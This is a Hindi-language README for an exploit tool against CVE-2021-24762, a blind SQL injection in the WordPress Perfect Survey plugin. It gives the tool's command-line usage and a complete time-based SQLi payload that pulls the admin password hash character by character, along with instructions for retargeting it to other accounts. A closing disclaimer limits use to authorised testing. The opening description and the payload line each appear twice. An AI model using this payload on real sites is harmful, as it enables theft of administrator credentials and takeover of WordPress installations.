
यह रेपो CVE-2021-24762 के लिए एक एक्सप्लॉइट दिखाता है। यह एक ब्लाइंड SQLi एक्सप्लॉइट है जो डिफ़ॉल्ट कॉन्फ़िगरेशन पर एडमिन पासवर्ड निकालता है।
यह रिपॉजिटरी CVE-2021-24762 के लिए एक शोषण दिखाती है। यह एक ब्लाइंड SQLi शोषण है जो डिफ़ॉल्ट कॉन्फ़िगरेशन पर एडमिन पासवर्ड प्राप्त करता है।
एक लैब करते समय, जो Wordpress और PerfectSurvey प्लगइन पर आधारित थी, मैं एक SQL कमजोरी पर अटक गया। मुझे जो एकमात्र उपलब्ध PoC मिले, वे sqlmap पर आधारित थे और उस लैब में ठीक से काम नहीं कर रहे थे जिस पर मैं काम कर रहा था (इसमें बहुत सारे अतिरिक्त प्रश्न थे, जैसे एप्लिकेशन द्वारा 404 लौटाना, टाइमआउट में बहुत अधिक भिन्नता, और अन्य समस्याएं)। इसलिए मैंने लैब का शोषण करने के लिए इसे बनाया।
____ _ ___ ____
/ ___| / \ |_ _| / ___|
| | / _ \ | | \___ \
| |___ / ___ \ | | __ ) |
\____|/_/ \_\ |___| |____/
CAIS - Inteligência em Cibersegurança
Exploit for: CVE-2021-24762
usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]
Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it
options:
-h, --help show this help message and exit
-u, --url URL Base URL (default: http://192.168.10.10)
-p, --path PATH path (default: /wp-admin/admin-ajax.php)
-d, --delay DELAY delay in seconds (default: 30)
-t, --timeout TIMEOUT
timeout in seconds (default: delay + 15)
-c, --charset CHARSET
charset to be used (default: alnum + ./$_-@)
-m, --max-len MAX_LEN
maximum length (default: 20)
-v, --verbose activates log debugging
Python स्क्रिप्ट उपरोक्त पैरामीटर प्राप्त करती है। यदि वे पारित नहीं किए जाते हैं, तो स्क्रिप्ट अपने डिफ़ॉल्ट मानों के साथ निष्पादित होती है।
आदर्श रूप से, आपको कम से कम URL पारित करना होगा। इसे -u या --url के साथ करें। अन्य पैरामीटर संभवतः डिफ़ॉल्ट के साथ काम करेंगे।
डिफ़ॉल्ट कॉन्फ़िगरेशन में, यह उपयोगकर्ता admin का पासवर्ड हैश प्राप्त करेगा। यह कॉन्फ़िगरेशन payload वैरिएबल में user_login के मान में लागू किया गया है:
payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"
यदि आपको किसी अन्य उपयोगकर्ता के लिए हैश खोजने की आवश्यकता है, तो "0x61646d696e" (admin) को अपनी आवश्यकता के अनुसार बदलें।
payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"प्रतिबंधित उपयोग — इस रिपॉजिटरी में संवेदनशील सामग्री है जो केवल नैतिक और जिम्मेदार उपयोग के लिए है। याद रखें कि आपके पास उस सिस्टम के मालिक से लिखित अनुमति होनी चाहिए जिसका आप परीक्षण कर रहे हैं। इस दायरे से बाहर किसी भी उपयोग की अनुमति नहीं है और यह आप पर आरोपित किया जाएगा (क्या आप जेल जाना चाहते हैं?)।
exploit_cve-2021-24762 — शोषण।README.ME — यह फ़ाइल।2025-10-10 — c4cnm — निर्माण और प्रारंभिक संशोधन
GNU General Public License v3 (GPL)